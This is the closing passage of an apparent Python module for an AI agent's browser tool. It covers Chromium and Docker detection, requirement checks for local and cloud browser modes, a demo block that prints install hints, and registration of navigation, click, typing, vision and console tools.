_agent_browser_resolved 2739 global _cached_command_timeout, _command_timeout_resolved 2740 global _cached_chromium_installed 2741 _cached_agent_browser = None 2742 _agent_browser_resolved = False 2743 _discover_homebrew_node_dirs.cache_clear() 2744 _cached_command_timeout = None 2745 _command_timeout_resolved = False 2746 _cached_chromium_installed = None 2747 2748 # ============================================================================ 2749 # Requirements Check 2750 # ============================================================================ 2751 2752 2753 # Cache for Chromium discovery. Invalidated by _reset_browser_caches. 2754 _cached_chromium_installed: Optional[bool] = None 2755 2756 2757 def _chromium_search_roots() -> List[str]: 2758 """Directories to scan for a Chromium / headless-shell build. 2759 2760 Order mirrors what agent-browser and Playwright actually probe: 2761 2762 1. ``PLAYWRIGHT_BROWSERS_PATH`` when set (Docker image sets this to 2763 ``/opt/hermes/.playwright``). 2764 2. ``~/.cache/ms-playwright`` — Playwright's default on Linux/macOS. 2765 3. ``~/Library/Caches/ms-playwright`` — Playwright's default on macOS. 2766 4. ``%USERPROFILE%\\AppData\\Local\\ms-playwright`` — Playwright's default 2767 on Windows. 2768 """ 2769 roots: List[str] = [] 2770 env_path = os.environ.get("PLAYWRIGHT_BROWSERS_PATH", "").strip() 2771 if env_path and env_path != "0": 2772 roots.append(env_path) 2773 home = os.path.expanduser("~") 2774 roots.append(os.path.join(home, ".cache", "ms-playwright")) 2775 if sys.platform == "darwin": 2776 roots.append(os.path.join(home, "Library", "Caches", "ms-playwright")) 2777 if sys.platform == "win32": 2778 local = os.environ.get("LOCALAPPDATA") or os.path.join( 2779 home, "AppData", "Local" 2780 ) 2781 roots.append(os.path.join(local, "ms-playwright")) 2782 return roots 2783 2784 2785 def _chromium_installed() -> bool: 2786 """Return True when a usable Chromium (or headless-shell) build is on disk. 2787 2788 Checks, in order: 2789 2790 1. ``AGENT_BROWSER_EXECUTABLE_PATH`` env var — the official way to point 2791 agent-browser at a pre-installed Chrome/Chromium. 2792 2. System Chrome/Chromium in PATH (``google-chrome``, ``chromium-browser``, 2793 ``chrome``). 2794 3. Playwright's browser cache (current logic) — directories containing 2795 ``chromium-*`` or ``chromium_headless_shell-*``. 2796 2797 agent-browser (0.26+) downloads Playwright's chromium / headless-shell 2798 builds into ``PLAYWRIGHT_BROWSERS_PATH`` and won't start without at least 2799 one of the three above being present. Without a browser binary the CLI 2800 hangs on first use until the command timeout fires (often ~30s). Guarding 2801 the tool behind this check prevents advertising a capability that will 2802 fail at runtime. 2803 """ 2804 global _cached_chromium_installed 2805 if _cached_chromium_installed is not None: 2806 return _cached_chromium_installed 2807 2808 # 1. AGENT_BROWSER_EXECUTABLE_PATH — explicit user-configured browser 2809 ab_path = os.environ.get("AGENT_BROWSER_EXECUTABLE_PATH", "").strip() 2810 if ab_path: 2811 if os.path.isfile(ab_path) or shutil.which(ab_path): 2812 _cached_chromium_installed = True 2813 return True 2814 2815 # 2. System Chrome/Chromium in PATH (common names) 2816 system_chrome = shutil.which("google-chrome") or shutil.which("chromium-browser") or shutil.which("chrome") 2817 if system_chrome: 2818 _cached_chromium_installed = True 2819 return True 2820 2821 # 3. Playwright browser cache (legacy — chromium-* / chromium_headless_shell-* dirs) 2822 for root in _chromium_search_roots(): 2823 if not root or not os.path.isdir(root): 2824 continue 2825 try: 2826 entries = os.listdir(root) 2827 except OSError: 2828 continue 2829 # Playwright names them ``chromium-<build>`` and 2830 # ``chromium_headless_shell-<build>``; agent-browser accepts either. 2831 for entry in entries: 2832 if entry.startswith("chromium-") or entry.startswith( 2833 "chromium_headless_shell-" 2834 ): 2835 _cached_chromium_installed = True 2836 return True 2837 2838 _cached_chromium_installed = False 2839 return False 2840 2841 2842 def _running_in_docker() -> bool: 2843 """Best-effort detection of whether we're inside a Docker container.""" 2844 if os.path.exists("/.dockerenv"): 2845 return True 2846 try: 2847 with open("/proc/1/cgroup", "rt") as fp: 2848 return "docker" in fp.read() 2849 except OSError: 2850 return False 2851 2852 2853 def check_browser_requirements() -> bool: 2854 """ 2855 Check if browser tool requirements are met. 2856 2857 In **local mode** (no cloud provider configured): the ``agent-browser`` 2858 CLI must be findable *and* a Chromium build must be installed on disk. 2859 2860 In **cloud mode** (Browserbase, Browser Use, or Firecrawl): the CLI 2861 and the provider's required credentials must be present. The cloud 2862 provider hosts its own Chromium, so no local browser binary is needed. 2863 2864 Returns: 2865 True if all requirements are met, False otherwise 2866 """ 2867 # Camofox backend — only needs the server URL, no agent-browser CLI 2868 if _is_camofox_mode(): 2869 return True 2870 2871 # CDP override mode can connect to an existing remote/local browser endpoint 2872 # without requiring the local agent-browser binary on PATH. 2873 if _get_cdp_override(): 2874 return True 2875 2876 # The agent-browser CLI is required for local launch and cloud-provider flows. 2877 try: 2878 browser_cmd = _find_agent_browser() 2879 except FileNotFoundError: 2880 return False 2881 2882 # On Termux, the bare npx fallback is too fragile to treat as a satisfied 2883 # local browser dependency. Require a real install (global or local) so the 2884 # browser tool is not advertised as available when it will likely fail on 2885 # first use. 2886 if _requires_real_termux_browser_install(browser_cmd): 2887 return False 2888 2889 # In cloud mode, also require provider credentials. Cloud browsers 2890 # don't need a local Chromium binary. 2891 provider = _get_cloud_provider() 2892 if provider is not None: 2893 return provider.is_configured() 2894 2895 # Local mode: agent-browser needs a Chromium build on disk. Without it 2896 # the CLI hangs on first use until the command timeout fires. 2897 if not _chromium_installed(): 2898 return False 2899 2900 return True 2901 2902 2903 # ============================================================================ 2904 # Module Test 2905 # ============================================================================ 2906 2907 if __name__ == "__main__": 2908 """ 2909 Simple test/demo when run directly 2910 """ 2911 print("🌐 Browser Tool Module") 2912 print("=" * 40) 2913 2914 _cp = _get_cloud_provider() 2915 mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})" 2916 print(f" Mode: {mode}") 2917 2918 # Check requirements 2919 if check_browser_requirements(): 2920 print("✅ All requirements met") 2921 else: 2922 print("❌ Missing requirements:") 2923 try: 2924 browser_cmd = _find_agent_browser() 2925 if _requires_real_termux_browser_install(browser_cmd): 2926 print(" - bare npx fallback found (insufficient on Termux local mode)") 2927 print(f" Install: {_browser_install_hint()}") 2928 elif _cp is None and not _chromium_installed(): 2929 print(" - Chromium browser binary not found") 2930 searched = ", ".join(_chromium_search_roots()) or "(no candidate paths)" 2931 print(f" Searched: {searched}") 2932 if _running_in_docker(): 2933 print( 2934 " Docker: pull the latest image — the current one " 2935 "predates the bundled Chromium install" 2936 ) 2937 print(" docker pull ghcr.io/nousresearch/hermes-agent:latest") 2938 else: 2939 print(" Install it with:") 2940 print(" npx agent-browser install --with-deps") 2941 print(" Or: npx playwright install --with-deps chromium") 2942 except FileNotFoundError: 2943 print(" - agent-browser CLI not found") 2944 print(f" Install: {_browser_install_hint()}") 2945 if _cp is not None and not _cp.is_configured(): 2946 print(f" - {_cp.provider_name()} credentials not configured") 2947 print(" Tip: set browser.cloud_provider to 'local' to use free local mode instead") 2948 2949 print("\n📋 Available Browser Tools:") 2950 for schema in BROWSER_TOOL_SCHEMAS: 2951 print(f" 🔹 {schema['name']}: {schema['description'][:60]}...") 2952 2953 print("\n💡 Usage:") 2954 print(" from tools.browser_tool import browser_navigate, browser_snapshot") 2955 print(" result = browser_navigate('https://example.com', task_id='my_task')") 2956 print(" snapshot = browser_snapshot(task_id='my_task')") 2957 2958 2959 # --------------------------------------------------------------------------- 2960 # Registry 2961 # --------------------------------------------------------------------------- 2962 from tools.registry import registry, tool_error 2963 2964 _BROWSER_SCHEMA_MAP = {s["name"]: s for s in BROWSER_TOOL_SCHEMAS} 2965 2966 registry.register( 2967 name="browser_navigate", 2968 toolset="browser", 2969 schema=_BROWSER_SCHEMA_MAP["browser_navigate"], 2970 handler=lambda args, **kw: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")), 2971 check_fn=check_browser_requirements, 2972 emoji="🌐", 2973 ) 2974 registry.register( 2975 name="browser_snapshot", 2976 toolset="browser", 2977 schema=_BROWSER_SCHEMA_MAP["browser_snapshot"], 2978 handler=lambda args, **kw: browser_snapshot( 2979 full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")), 2980 check_fn=check_browser_requirements, 2981 emoji="📸", 2982 ) 2983 registry.register( 2984 name="browser_click", 2985 toolset="browser", 2986 schema=_BROWSER_SCHEMA_MAP["browser_click"], 2987 handler=lambda args, **kw: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")), 2988 check_fn=check_browser_requirements, 2989 emoji="👆", 2990 ) 2991 registry.register( 2992 name="browser_type", 2993 toolset="browser", 2994 schema=_BROWSER_SCHEMA_MAP["browser_type"], 2995 handler=lambda args, **kw: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")), 2996 check_fn=check_browser_requirements, 2997 emoji="⌨️", 2998 ) 2999 registry.register( 3000 name="browser_scroll", 3001 toolset="browser", 3002 schema=_BROWSER_SCHEMA_MAP["browser_scroll"], 3003 handler=lambda args, **kw: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")), 3004 check_fn=check_browser_requirements, 3005 emoji="📜", 3006 ) 3007 registry.register( 3008 name="browser_back", 3009 toolset="browser", 3010 schema=_BROWSER_SCHEMA_MAP["browser_back"], 3011 handler=lambda args, **kw: browser_back(task_id=kw.get("task_id")), 3012 check_fn=check_browser_requirements, 3013 emoji="◀️", 3014 ) 3015 registry.register( 3016 name="browser_press", 3017 toolset="browser", 3018 schema=_BROWSER_SCHEMA_MAP["browser_press"], 3019 handler=lambda args, **kw: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")), 3020 check_fn=check_browser_requirements, 3021 emoji="⌨️", 3022 ) 3023 3024 registry.register( 3025 name="browser_get_images", 3026 toolset="browser", 3027 schema=_BROWSER_SCHEMA_MAP["browser_get_images"], 3028 handler=lambda args, **kw: browser_get_images(task_id=kw.get("task_id")), 3029 check_fn=check_browser_requirements, 3030 emoji="🖼️", 3031 ) 3032 registry.register( 3033 name="browser_vision", 3034 toolset="browser", 3035 schema=_BROWSER_SCHEMA_MAP["browser_vision"], 3036 handler=lambda args, **kw: browser_vision(question=args.get("question", ""), annotate=args.get("annotate", False), task_id=kw.get("task_id")), 3037 check_fn=check_browser_requirements, 3038 emoji="👁️", 3039 ) 3040 registry.register( 3041 name="browser_console", 3042 toolset="browser", 3043 schema=_BROWSER_SCHEMA_MAP["browser_console"], 3044 handler=lambda args, **kw: browser_console(clear=args.get("clear", False), expression=args.get("expression"), task_id=kw.get("task_id")), 3045 check_fn=check_browser_requirements, 3046 emoji="🖥️", 3047 )